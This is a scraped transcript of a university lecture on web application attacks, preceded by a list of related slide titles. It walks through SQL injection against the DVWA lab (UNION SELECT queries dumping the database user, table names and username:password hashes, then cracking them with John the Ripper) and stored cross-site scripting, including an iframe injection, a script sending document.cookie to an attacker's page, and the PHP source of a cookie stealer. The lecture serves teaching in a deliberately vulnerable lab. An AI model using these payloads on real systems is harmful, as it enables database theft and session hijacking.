Web Applications Attacks A: SQL Injection Stored Cross Site Scripting Prof. Reuven Aviv Department of Computer Science Tel Hai Academic College Topics.

Slides:



Advertisements
Similar presentations
PHP Form and File Handling
Advertisements

Nick Feamster CS 6262 Spring 2009
PHP I.
What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu Ostrava-Poruba.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
Creating WordPress Websites. Creating a site on your computer Local server Local WordPress installation Setting Up Dreamweaver.
Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.
Browser Exploitation Framework (BeEF) Lab
Computer Science 101 Web Access to Databases Overview of Web Access to Databases.
1 CS428 Web Engineering Lecture 18 Introduction (PHP - I)
WEB SECURITY WORKSHOP TEXSAW 2013 Presented by Joshua Hammond Prepared by Scott Hand.
Web Application Vulnerabilities Checklist. EC-Council Parameter Checklist  URL request  URL encoding  Query string  Header  Cookie  Form field 
Christopher M. Pascucci Basic Structural Concepts of.NET Browser – Server Interaction.
Introduction to InfoSec – Recitation 10 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)
Lecture 3 – Data Storage with XML+AJAX and MySQL+socket.io
8 Chapter Eight Server-side Scripts. 8 Chapter Objectives Create dynamic Web pages that retrieve and display database data using Active Server Pages Process.
Application Development Description and exemplification of server-side scripting language for server connection, database selection, execution of SQL queries.
1Computer Sciences Department Princess Nourah bint Abdulrahman University.
INTERNET APPLICATION DEVELOPMENT For More visit:
Prevent Cross-Site Scripting (XSS) attack
WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas.
Server-side Scripting Powering the webs favourite services.
CSCI 6962: Server-side Design and Programming Secure Web Programming.
Lecture 14 – Web Security SFDV3011 – Advanced Web Development 1.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
1 PHP and MySQL. 2 Topics  Querying Data with PHP  User-Driven Querying  Writing Data with PHP and MySQL PHP and MySQL.
15/10/20151 PHP & MySQL 'Slide materials are based on W3Schools PHP tutorial, 'PHP website 'MySQL website.
Web Scripting [PHP] CIS166AE Wednesdays 6:00pm – 9:50pm Rob Loy.
SYST Web Technologies SYST Web Technologies Databases & MySQL.
Web Application Security ECE ECE Internetwork Security What is a Web Application? An application generally comprised of a collection of scripts.
Security Scanners Mark Shtern. Popular attack targets Web – Web platform – Web application Windows OS Mac OS Linux OS Smartphone.
Top Five Web Application Vulnerabilities Vebjørn Moen Selmersenteret/NoWires.org Norsk Kryptoseminar Trondheim
1 Chapter 9 – Cookies, Sessions, FTP, and More spring into PHP 5 by Steven Holzner Slides were developed by Jack Davis College of Information Science.
Prof Frankl, Spring 2008CS Polytechnic University 1 Overview of Web database applications with PHP.
Intro to DatabasesClass 4 SQL REVIEW To talk to the database, you have to use SQL SQL is used by many databases, not just MySQL. SQL stands for Structured.
Open Source Server Side Scripting ECA 236 Open Source Server Side Scripting PHP & MySQL.
Open Source Server Side Scripting ECA 236 Open Source Server Side Scripting MySQL – Inserting Data.
Web Applications Testing By Jamie Rougvie Supported by.
By Sean Rose and Erik Hazzard.  SQL Injection is a technique that exploits security weaknesses of the database layer of an application in order to gain.
Controlling Web Site Access Using Logins CS 320. Basic Approach HTML form a php page that collects the username and password  Sends them to second PHP.
NMD202 Web Scripting Week5. What we will cover today PHP & MySQL Displaying Dynamic Pages Exercises Modifying Data PHP Exercises Assignment 1.
WEB SECURITY WEEK 2 Computer Security Group University of Texas at Dallas.
Web Security Lesson Summary ●Overview of Web and security vulnerabilities ●Cross Site Scripting ●Cross Site Request Forgery ●SQL Injection.
8 Chapter Eight Server-side Scripts. 8 Chapter Objectives Create dynamic Web pages that retrieve and display database data using Active Server Pages Process.
INFO 344 Web Tools And Development CK Wang University of Washington Spring 2014.
8 th Semester, Batch 2009 Department Of Computer Science SSUET.
Higher Computing Science Coding the Web: HTML, JavaScript, PHP and MySQL.
Session 11: Cookies, Sessions ans Security iNET Academy Open Source Web Development.
Introduction Prof. Reuven Aviv Department of Computer Science Tel Hai Academic College Topics in Data Communications 2012.
ADVANCED SQL.  The SQL ORDER BY Keyword  The ORDER BY keyword is used to sort the result-set by one or more columns.  The ORDER BY keyword sorts the.
By Collin Donaldson. Hacking is only legal under the following circumstances: 1.You hack (penetration test) a device/network you own. 2.You gain explicit,
SQL Injection By Wenonah Abadilla. Topics What is SQL What is SQL Injection Damn Vulnerable Web App SQLI Demo Prepared Statements.
SlideSet #20: Input Validation and Cross-site Scripting Attacks (XSS) SY306 Web and Databases for Cyber Operations.
Web Security (cont.) 1. Referral issues r HTTP referer (originally referrer) – HTTP header that designates calling resource  Page on which a link is.
SQL Injection By Wenonah Abadilla.
Group 18: Chris Hood Brett Poche
Introduction to Dynamic Web Programming
WEB APPLICATION TESTING
SQL Injection.
Database Driven Websites
Lecture 2 - SQL Injection
MySQL Web Application Connecting to a MySQL database
Protecting Against Common Web Application Vulnerabilities
Exploring DOM-Based Cross Site Attacks
Cross-Site Scripting Attack (XSS)
Cross Site Request Forgery (CSRF)
Presentation transcript:

Web Applications Attacks A: SQL Injection Stored Cross Site Scripting Prof. Reuven Aviv Department of Computer Science Tel Hai Academic College Topics in Data Communications

Contents 1. Hacking Lab Setup 2. SQL Injection Attack 3. Stored Cross Site Scripting Attack References: Engbretson: The basics of Hacking and Penetration Testing Stuttard: Web Applications Hacker’s Handbook ml

Hacking Lab Setup

The Single Machine Penetration Testing Lab (1) Windows 7 Host Vmware Player virtualization application Variety of linux and winxp guest operating systems run on top of vmware – 1. Fedora 14, hosting the DVWA database application Applications with well defined vulnerabilities Designed for studying vulnerabilities and exploits – Damn Vulnerable Web Application

DVWA: Damn Vulnerable Web Application 3 security levels: low, medium, high Code compare option

The Single Machine Penetration Testing Lab (2) 2. Backtrack 5 – An ubuntu based linux, enriched with many attacking utilities Designed for testing attacks Linux on steroids In this lecture Backtrack will usually be the attacker, and the vulnerable web applications will be on Fedora14/DVWA

Backtrack5

The Single Machine Penetration Testing Lab (2) 3. Windows XP SP2 (un patched) – Has severe vulnerabilities Mostly for testing attacks with Metasploit Framework Other guest operating systems – Ubuntu – Ubuntu Usually serve as users, sometimes as victims and sometimes as associates of the attacker

SQL Injection

The dynamics of a web page

1.user supply data (via a form element or URL) 2. Browser sends HTTP Request with the data to Web Server 3. The Web server pass the data to the appropriate application (e.g. PHP script) 4. application sends an SQL Query, based on the supplied data, to the MySQL Database Management System (DBMS)

The dynamics of a web page 5. MySQL DBMS interrogates the database, construct a reply and sends it back to the Application 6. Application constructs an html page, based on the result, passes it to the web server 7. The Web Server sends the html page to browser 8. Browser renders the web page (shows to the user) Note: html page might contains client-side scripts (Javascript); the browser then runs the script, which updates the page, and then displays it

SQL Injection Attack: Basic Idea If User data is not checked, malicious user can insert a payload (SQL program code) to its data The user data will be sent to the MySQL processor that will execute it. Replies from the MySQL processor get back to the PHP Application The reply might: – Reveal information from the database – Change the database – Give control over the OS of the Web server – And more

In this exercise Attacker: Backtrack5 R1 Victim: Fedora 14, DVWA: user search application – Vulnerability: No input check We will Inject code into the MySQL database We will get information about the structure of the database such as table contents, user names and MD5 hashed passwords We will use John The Ripper to crack the passwords

The Search Application window Insert to the form: 1 – User_id, a number Output: For all users that their records in the database have value of (user_id = 1) as TRUE print their first name, last name and their id

Example: Getting the ID =1 user info The SQL Query is: ′′ SELECT first_name, Surname FROM users WHERE user_id = ' 1' ′′ MySQL searches the users table to find a record with (user_id =1) is TRUE; replies withthe other two fields in the table: first_name, Surname

The OR “=‘ test for vulnerability Insert to the form: a’ OR “=‘ The SQL Query is: ′′ SELECT first_name, Surname FROM users WHERE user_id = ' a' OR ''='' ′′ What will be the result?

The OR “ = ‘ test: Result

The OR “=‘ Test: explanation MySQL searches the users table to find a records with (user_id = ' a' OR ''='') is TRUE; sends back the other two fields in the table: first_name, Surname ''='' statement has the value TRUE empty string on both sides of the equal sign. (user_id = 'a' )OR (''='' ) has always the value TRUE The value of a is not relevant all records in data base have the value TRUE for the WHERE clause

Using UNION: Finding Current MySQL Version Insert: a' UNION SELECT null, The query returns two values Empty string for first_name (due to the null) The version number SQL in Surname

Using UNION to insert a 2 nd SQL Query The query is: ′′SELECT first_name, last_name FROM users WHERE user_id = 'a' UNION SELECT 1, UNION returns records of the two SELECT queries one after the other; Number of columns in the second query must match the number in the first query (here 2); otherwise error. – Field titles (First name, surname) are from the 1 st query 1 st SELECT provides no results 2 nd SELECT has first item as (arbitrary) null Second item is the database version

Finding name of Database, & location of database files Insert: ′ UNION SELECT database(), Result: 1 st SELECT provides no results 2 nd SELECT: first_name (Database name): dvwa Surname (Directory of files in the Operating System): /var/lib/mysql/

Getting the database user Insert: a’ AND 1=0 UNION SELECT null, user() # user() returns the name of the remote user that runs the sql process. That determines its privileges In this case it is root

Find all table names Insert: a’ AND 1=0 UNION SELECT table_name, table_schema FROM information_schema.tables; # The information_schema contains the meta-data of the database: table names, column names, privileges tables, etc. Here we want the names of all the tables. For each we want the table_name and the database it belongs to (the table_schema)

List of tables and their ‘databases’ databases: information_schema, dvwa, mysql

Find all tables that start with ‘user’ Insert to the form: a’ AND 1=0 UNION SELECT table_name, table_schema FROM information_schema.tables WHERE table_name like ‘user%’ #

Tables that start with ‘user’ user_privileges (information_schema database) users (dvwa database) user (mysql database)

Find Columns of table ‘dvwa:users’ Insert: a’ AND 1=0 UNION SELECT concat_WS(‘:’, table_schema, table_name), column_name FROM information_schema.columns WHERE table_name = ‘users’ # concat(separator, valu1, value2, …) concatenates string values, With Separator to one string (here because we can get only 2 values)

Column names of table ‘dvwa:users’ user_id, first_name, last_name, user, password, avatar

Find Contents of dvwa:users table Insert to the form: a’ AND 1=0 UNION SELECT concat_WS(‘:’first_name, last_name), concat_WS(‘:’,user, password) FROM users; #

Contents of dvwa:users table The second field is username:password

Collect the user:password values to the file dvwa_passwd.txt

Cracking the passwords using John The Ripper Here we assume that the password are kept as MD5 hash

Stored Cross Site Scripting Attack

Mechanism of Stored Cross Site Scripting Attacks One user (the Hacker) attacks an un-suspecting user that access the same vulnerable webpage The attacker insert a script (instead of a string) that is stored in the server (usually in a database) The script is downloaded to the victim’s browser whenever it access the same application

Stored Cross Site Scripting Attack example Application: Guest book User visits a web page, write a message Messages stored in a backend database Whenever a user (victim) accesses the guestbook, all previous messages downloaded to that user browser Malicious user (the attacker) could insert a javascript message (also called payload) When the payload is downloaded to a victim user’s browser, it executes and does bad things – Connect to a malicious website, steal cookie,,,,

This exercise: Attacking other users Attacker: Backtrack5 R1 Vulnerable Application on Fedora 14/DVWA webserver: stored cross site scripting, (a guest book application) – The vulnerability: user input not checked, or filtered Victims: Other users using the same application We will exploit the vulnerability to attack other users using the same application – Inject code, direct to other websites, steal cookies

User abi access the vulnerable Application (Guestbook) page, writes a message User info: Name, Message

Result Previous initial messages and abi’s message are downloaded to abi’s browser

Now John (attacker) inserts a script Insert (a javascript): Hi all alert(“Alert from John”) This will serve as a test whether the application checks its data

The script is executed on John’s browser The application sends the script to the browser, which executes it The test is successful; The application does not check, filter, sanitize the User input

Inserting a foreign page to the web browser of victim Insert in the message field: iframe embeds inline other document in the webpage; here, the cnn home page

Embedding an inline document This could be any malicious website

Inserting another foreign page Insert in the message field: HI GUYS GO TO THE Secmaniac WEBSITE HOME OF THE SOCIAL ENGINEER TOOLKIT (SET)

The user gets a surprise new frame

Cookie Stealing: Attempt 1: (failed) Victim login to website DVWA, gets a cookie. Attacker sends to the victim, persuade the victim to click on this “interesting (attacker’s) site” Victim clicks, redirected to that attacker’s site The Attacker site’s HTTP responds with a malicious script that commands the browser to send him the cookie generated by another (the DVWA) site. But a browser is allowed to send cookie only if the commanding javascript came from the same site that originally created the cookie (Same Origin Policy) We need to send script from the DVWA application

Cookie Stealing: Attempt 2 Attacker installs a script in DVWA application, downloaded to a victim user. The script has a link. By clicking on it, the victim’s browser sends a GET request to load another page (from the attacker’s website) Since the script came from DVWA application, trusted by the victim’s browser, the cookie (previously received from DVWA application) is automatically sent in this GET packet. The HTTP request is received and processed by a CookieStealer.php script on the attacker’s website.

redirect users to a cookie stealing page Insert the message: a very interesting site CookieStealer.php; The address above is that of the attacker website CookieStealer.php script copies the cookie of whoever accesses the script

The user’s message has a link Other users will see the link ( a very interesting site) They might be tempted to click on it

The link reappear every time a user sends a message Another user accessed the guestbook This new user clicks on the link…

The user was redirected to the malicious site

A direct method for stealing the user’s cookie Insert into the message field: document.location=‘ Stealer.php?cookie=‘+document.cookie; CookieStealer.php gets the value of the cookie parameter that holds the cookie associated with the current webpage; value is stored in the browser’s host in the document.cookie property

The response from the Attacker’s CookieStealer.php Application

A new user (Ubuntu) log in to the DVWA web application

The Ubuntu user clicks on the Stored XSS application (the guestbook application)

The new user is redirected to the Attacker website As soon as the new user accesses the application for the first time, the script is downloaded to his browser, and he is redirected to the malicious (or faked) attacker’s website

Collecting the cookies of the victims On the attacker host (backtrack), at /var/www: – CookieStealer.php application – log.txt file contains the cookies of the victims

A simple cookiestealer.php Cookie Stealer <?php $cookie = $_GET['cookie']; $log = fopen("log.txt","a"); fwrite($log, $cookie "\n"); fclose($log); echo 'You have been hacked. You are now visiting MY WEBSITE I am now copying your DVWA cookie Your attacker Please click here to go back to the DVWA website ' ?>